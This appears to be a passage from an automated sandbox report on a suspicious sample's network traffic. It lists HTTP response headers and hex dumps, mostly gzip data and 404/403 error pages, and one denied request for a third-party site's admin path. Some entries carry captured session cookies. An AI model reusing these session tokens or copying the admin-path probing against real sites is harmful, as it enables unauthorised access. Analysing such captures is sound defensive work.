4d 00 15 c4 98 45 20 55 f8 9b 01 8e 7f 06 25 18 c7 00 04 91 cb 45 80 32 fc fa 25 48 21 39 f9 15 25 e3 f9 f7 30 dc 42 75 38 00 c7 a1 de ff 18 d4 e5 2b 50 97 3f 00 b5 b4 1d 9a 7b 71 2c cb 43 94 30 dc 45 2a 90 b0 74 94 58 6e 05 a6 3f 59 8b d2 72 25 e1 17 fc bd e6 1a d9 09 fc 1b 3e 08 55 b3 5c 10 8d 49 ec ed 46 49 89 96 00 2d 88 36 68 17 c1 d7 bb bf 85 97 01 c4 fd 44 61 6d 15 3a 84 d5 22 f8 a0 a4 03 0d ef d6 15 06 40 fd 68 11 58 7c b4 b1 8b f7 7a 03 f3 1a ca bf c2 af 3f 85 1f 54 59 11 cb 33 31 04 ba bd 59 dc b0 25 0e d6 49 52 e2 22 d0 2a 53 d6 0c 0c a5 e2 92 e1 e3 14 a4 ca 95 10 aa 39 58 b2 e2 d8 54 4a db c1 a2 86 33 5b 2c 18 ae 38 c5 b0 1d 4c b9 e4 96 13 11 1a 4a 04 2e 66 1e 45 70 f9 00 1a c5 22 30 76 2d d0 14 88 36 00 ce 16 01 cd ef fd ab 90 1a 13 40 a1 31 5f 04 31 65 32 a4 4b 1e fb a9 98 e6 11 6a ad b4 89 5a a3 78 5f c3 57 df d3 97 5d 9c 6d 5d 70 74 5e ce fe d0 0b c7 de d1 ae 1a 5a c3 34 53 6c fd 54 12 bd e4 72 7e 7e 5d 11 c6 b8 5c ce cf 9f 13 0f 94 8e 46 03 05 a2 8b 6f 76 de 69 70 94 18 aa 79 65 d3 11 00 cf 61 7c 22 c9 8a 2f 89 55 3a a2 4a 3d 70 bc 91 24 13 c8 26 f0 34 72 25 d0 70 c9 54 13 11 c6 6e 56 28 ed 27 6e 2c 4a d4 e3 b3 8f 3f ff bd 53 ce 27 45 18 b2 b3 29 e4 b5 a4 ad 38 c7 fd 6a 80 15 d1 d0 01 0b 58 00 53 b4 2e 51 da 68 89 f6 46 a0 7b fc eb fa 96 8d cf Data Ascii: 6c9XobXR&m(rdB:bE$E(<NN>(l)Qrx=ME U%E2%H!9%0Bu8+P?{q,C0E*tXn?Yr%>U\IFI-6hDam:"@hX|z?TY31Y%IR"*S9XTJ3[,8LJ.fEp"0v-6@1_1e2KjZx_W]m]pt^Z4SlTr~~]\Fovipyea|"/U:J=p$&4r%pTnV('n,J?S'E)8jXS.QhF{
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 850abd45bec80705-ATLContent-Encoding: gzipData Raw: 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff 0d 0a Data Ascii: a8L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:16:06 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:16:06 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:22 GMTSet-Cookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pzltbOBqF8JXsnoSuIxq6Q7NGRv8VSvvRQDUYmzam%2FdfI6BX9U1pysWRxODqHpcxQ%2FvYvqajSs10Beljjk7pF0ijMV8Wp1r2lJ2AJx57o%2BH2q22TodC0XkofT04d7L37WA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd47d9197bd0-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 b8 11 fd df 9f 62 a2 02 89 0d 44 92 bd 97 6d b2 b1 ac e2 ba 9b 02 01 b6 b8 ed 6d 16 ed e2 b0 08 28 72 64 f1 42 91 2a 49 59 71 73 f9 ee 07 8a 92 2d ff 48 ae 8b 16 08 10 51 1c be 99 79 7c 33 22 9d 9c 7c f8 e9 fd dd d7 4f 37 50 d8 52 a4 a3 e4 24 0c 7f e1 39 08 0b b7 37 70 f9 2d 85 c4 4d 00 15 c4 98 45 20 55 f8 ab 01 8e 7f 06 25 18 c7 00 04 91 cb 45 80 32 fc f2 39 48 21 39 f9 05 25 e3 f9 b7 30 dc 42 75 38 00 c7 a1 2e bf 0f ea ea 15 a8 ab ef 80 5a da 0e cd bd 38 96 e5 21 4a 18 ee 22 15 48 58 3a 4a 2c b7 02 d3 1f ad 45 69 b9 92 f0 33 fe bb e6 1a d9 09 fc 06 ef 85 aa 59 2e 88 c6 24 f6 76 a3 a4 44 4b 80 16 44 1b b4 8b e0 cb dd df c2 ab 00 e2 7e a2 b0 b6 0a 1d c2 6a 11 bc 57 d2 81 86 77 eb 0a 03 a0 7e b4 08 2c 3e da d8 c5 3b df c0 bc 86 f2 af f0 cb 8f e1 7b 55 56 c4 f2 4c 0c 81 6e 6f 16 37 6c 89 Data Ascii: 6cbXobDmm(rdB*IYqs-HQy|3"|O7PR$97p-ME U%E29H!9%0Bu8.Z8!J"HX:J,Ei3Y.$vDKD~jWw~,>;{UVLno7l
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 05 Feb 2024 11:15:21 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTServer: nginx/1.23.4Content-Type: text/html; charset=UTF-8Content-Length: 0Vary: User-AgentSet-Cookie: PHPSESSID=6a863be9643b7bff70e69f550745b56e; path=/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=6ad362c97b4f2eb28aeb4b8d23703fe9; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=6ad362c97b4f2eb28aeb4b8d23703fe9; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: dRlEpjkJUklYfdQGFcNjovzPcontent-language: pt-brContent-Encoding: gzipData Raw: 31 32 34 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 74 b2 93 38 d9 38 c9 f4 20 1b 18 45 b2 28 d1 21 59 0c ab 68 4b ed c9 c7 0c f6 61 30 0b ec d3 60 5f f6 d5 3f b6 e7 14 49 89 94 a8 c4 e9 56 37 d6 84 ac 72 5d ce fd 56 c5 f2 d1 37 67 2f 4e 5f ff f5 e5 39 99 c9 c0 1f 1f 7d a3 eb ef 3c 97 3c 3d 27 83 f7 63 92 ff 1c e1 20 71 bc f8 58 f3 65 ac 11 9f 86 d3 63 8d 85 fa 9b 4b 8d d8 3e 15 e2 58 f3 d8 40 1b 93 a3 6f de b1 d0 f1 dc f7 ba 5e 04 36 fc 6a 60 c3 2d c0 a6 32 83 87 1d e3 6a 58 91 d4 ad 58 ad d7 f5 22 8c bd a3 19 a3 ce 78 4f 51 11 30 49 81 69 19 e9 ec 63 e2 dd 1c 6b 3f e9 6f 26 fa 29 0f 22 2a 3d cb 67 40 0b 0f 25 0b e5 b1 f6 f4 fc 98 39 53 e8 31 b6 ad 3d 4d a7 ea af 17 51 71 a1 64 73 69 20 89 87 c4 9e d1 58 30 79 fc e6 f5 63 7d b0 06 29 a4 01 3b d6 68 14 f9 4c f7 64 12 32 a1 c3 1f 05 38 f0 97 ee 39 c7 c3 f6 f0 a0 b7 3f e8 f5 9a 04 7b 68 3c 4d 02 1c 47 4a c4 c8 30 22 d9 12 cc 4e 62 d6 f2 82 9b a4 65 f3 c0 08 91 82 3f 09 9e c4 36 3b b6 68 18 b2 58 21 2f 22 9e 72 3e 05 cc 91 4f 17 d5 78 01 50 0a 31 e0 96 e7 33 9b c7 0e bf a1 1b 70 52 06 d2 39 fa 2d b3 10 98 6e d3 88 96 a5 b9 60 e2 61 4b 85 a4 32 11 ba 45 63 68 2e 4a 30 2c 9f da 1f 74 19 d3 50 f8 89 0d 5d ff 0f 89 f1 bd f0 03 89 99 9f 03 94 3c b1 67 ba 07 cb 34 22 bc 9f 19 98 f9 fe c1 7c ff 40 23 b3 98 b9 c7 1a 6a 11 94 b8 ae 41 f8 04 3c 34 6e 3d 39 0b 98 e1 05 53 c3 a5 37 08 c5 58 07 ab 2b 70 ad 28 9c 3e 98 80 be 39 ef 9b bb 23 40 81 fb 2a 02 0e 3a f3 83 ce ee 08 50 e0 be 8e 80 fe fc a0 bf 43 02 10 dc 57 11 d0 6e f7 e6 f0 d9 1d Data Ascii: 1242;nH#$t88 E(!YhKa0`_?IV7r]V7g/N_9}<<='c qXecK>X@o^6j`-2jXX"xOQ0Iick?o&)"*=g@%9S1=MQqdsi X0yc});hLd289?{h<MGJ0"Nbe?6;hX!/"r>OxP13pR9-n`aK2Ech.J0,tP]<g4"|@#jA<4n=9S7X+p(>9#@*:PCWn
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 264Expires: Mon, 05 Feb 2024 11:16:07 GMTDate: Mon, 05 Feb 2024 11:16:07 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131767264_1611129006_213793778_15_8964_103_0_-";dur=1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 37 36 37 26 23 34 36 3b 63 62 65 33 62 66 32 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131767&#46;cbe3bf2</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b 